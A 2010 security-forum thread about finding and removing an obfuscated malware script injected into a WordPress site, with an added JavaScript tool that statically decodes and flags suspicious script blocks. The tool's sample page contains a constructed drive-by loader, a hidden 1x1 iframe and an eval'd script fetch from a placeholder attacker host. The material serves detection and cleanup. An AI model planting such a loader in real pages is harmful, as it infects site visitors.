Government Security
Network Security Resources

Malware Detected On Website, Need To Remove

malware javascript php
3 replies to this topic

#1 shad0w7

shad0w7

    Private

  • Members
  • 7 posts

Posted 05 May 2010 - 10:11 AM

My friend's website seems to have malware on it; however, I am unsure exactly how to remove it. They are using a JavaScript which reads from another infected site, and this in turn loads the malware. The function seems to be obfuscated in some way. Also, this JavaScript is present on any page which I view on the website. Sorry for the vague details, but the function starts like this:

<!-- Google analitics BEGIN -->

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));

After which there is a large section which doesn't make any sense (includes part of an iframe along with some obfuscated stuff); all this is practically at the bottom of the whole HTML source. The main thing is actually finding exactly where they've inserted the function, as it's not just inserted simply on index.php.
The site is running WordPress.
If someone very trusted is willing to help me out, I can discuss more in private.

#2 webdevil

webdevil

    Retired GSO General

  • Sergeant Major
  • 1,195 posts

Posted 05 May 2010 - 11:39 AM

This is something that I picked from the source of this thread

<!-- Start Google Analytics -->
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {var pageTracker = _gat._getTracker("UA-11496563-1");pageTracker._trackPageview();} catch(err) {}
</script>

So you see, that's Google's stuff. Legitimate!
Give more source, maybe then we can help.

#3 bonarez

bonarez

    Retired GSO Second Lieutenant

  • Sergeant Major
  • 1,252 posts

Posted 05 May 2010 - 01:58 PM

After which there is a large section which doesn't make any sense (includes part of an iframe along with some obfuscated stuff)

That's the stuff that matters: how is it obfuscated, what does it do?
"Ask the right question and you will receive the right answer. I'm just very sensitive about the right syntax"

Read the rules before you post
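
Added example, not code from the thread or from the site under discussion: a static decoder for the document.write(unescape(...)) style of script block the thread is about. It pulls every <script> body out of a page, undoes the percent-encoding and String.fromCharCode wrappers without executing anything, and reports which hosts each block would load, so the stock Google Analytics loader (which uses the same wrapper) can be told apart from an injected one. The sample page and the host malware.example are constructed placeholders; the collapsing of "literal" + variable + "literal" joins is a heuristic that keeps only the host suffix of a split URL.

```javascript
// Constructed sample page: the Google Analytics loader quoted in the thread,
// followed by an injected block of the kind described (hosts are placeholders).
const toCharCodes = s => 'String.fromCharCode(' + [...s].map(c => c.charCodeAt(0)).join(',') + ')';
const SAMPLE_HTML = `<html><body>
<p>site content</p>
<!-- Google Analytics BEGIN -->
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
document.write(unescape("%3Ciframe src='http://malware.example/in.php' width='1' height='1' style='visibility:hidden'%3E%3C/iframe%3E"));
eval(${toCharCodes(`document.write("<script src='http://malware.example/js/k.js'></script>")`)});
</script>
</body></html>`;

// Hosts the thread treats as legitimate for this page.
const KNOWN_GOOD_HOSTS = new Set(['google-analytics.com']);

// Return the body of every <script> element in the HTML, in page order.
function extractScripts(html) {
  const out = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// Decode %XX and %uXXXX sequences the way unescape() would, without calling it.
function pctDecode(s) {
  return s
    .replace(/%u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Replace String.fromCharCode(n, n, ...) with a quoted literal of the string it builds.
function decodeCharCodes(s) {
  return s.replace(/String\.fromCharCode\(\s*([\d\s,]+)\)/g,
    (_, list) => JSON.stringify(String.fromCharCode(...list.split(',').map(n => parseInt(n, 10)))));
}

// Repeat both decoders until nothing changes, then collapse "a" + var + "b"
// joins so a URL split around a variable (the gaJsHost prefix) reads as one token.
function deobfuscate(js) {
  let s = js, prev;
  do { prev = s; s = pctDecode(decodeCharCodes(s)); } while (s !== prev);
  return s.replace(/["']\s*\+\s*[\w.$]+\s*\+\s*["']/g, '');
}

// Hosts referenced by src= attributes in the decoded markup (scheme stripped).
function loadedHosts(decodedJs) {
  const hosts = new Set();
  const re = /src\s*=\s*["']?(?:https?:\/\/)?([a-z0-9.-]+\.[a-z]{2,})/gi;
  let m;
  while ((m = re.exec(decodedJs)) !== null) hosts.add(m[1].toLowerCase());
  return [...hosts];
}

// Markers of a drive-by loader: 1x1 or hidden iframes, and eval of decoded text.
function hiddenFrameIndicators(decodedJs) {
  const ind = [];
  if (/<iframe\b/i.test(decodedJs)) {
    if (/(width|height)\s*=\s*["']?[01]\b/i.test(decodedJs)) ind.push('tiny iframe');
    if (/visibility\s*:\s*hidden|display\s*:\s*none/i.test(decodedJs)) ind.push('hidden iframe');
  }
  if (/\beval\s*\(/.test(decodedJs)) ind.push('eval');
  return ind;
}

// One verdict per script block: hosts loaded, hosts not on the allowlist, indicators.
function auditPage(html) {
  return extractScripts(html).map((raw, index) => {
    const decoded = deobfuscate(raw);
    const hosts = loadedHosts(decoded);
    const unknown = hosts.filter(h => !KNOWN_GOOD_HOSTS.has(h));
    const indicators = hiddenFrameIndicators(decoded);
    return { index, hosts, unknown, indicators, suspect: unknown.length > 0 || indicators.length > 0, decoded };
  });
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const r of auditPage(SAMPLE_HTML)) {
    console.log(`script #${r.index}: ${r.suspect ? 'SUSPECT' : 'ok'} hosts=${r.hosts.join(',') || '-'} indicators=${r.indicators.join(',') || '-'}`);
    if (r.suspect) console.log('  decoded: ' + r.decoded.trim().slice(0, 160));
  }
}
```

Run it with node against a saved copy of the page (replace SAMPLE_HTML with the file contents); the first block comes back clean with only google-analytics.com, the second is flagged for an unlisted host plus a hidden 1x1 iframe and an eval. Decoding statically rather than loading the page in a browser matters here because the payload is designed to be executed on view.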

#4 webdevil

webdevil

    Retired GSO General

  • Sergeant Major
  • 1,195 posts

Posted 06 May 2010 - 01:39 PM

I got your PM, shad0w7. This is what it is...
Posted Image


This must be due to a vulnerable installation of WordPress, as in most cases.

This probably drives users to a site which will download some "antivirus" or try to exploit a vulnerability, etc. But the domain name is interesting: "crimepayz", not forgetting the "biz" ;)
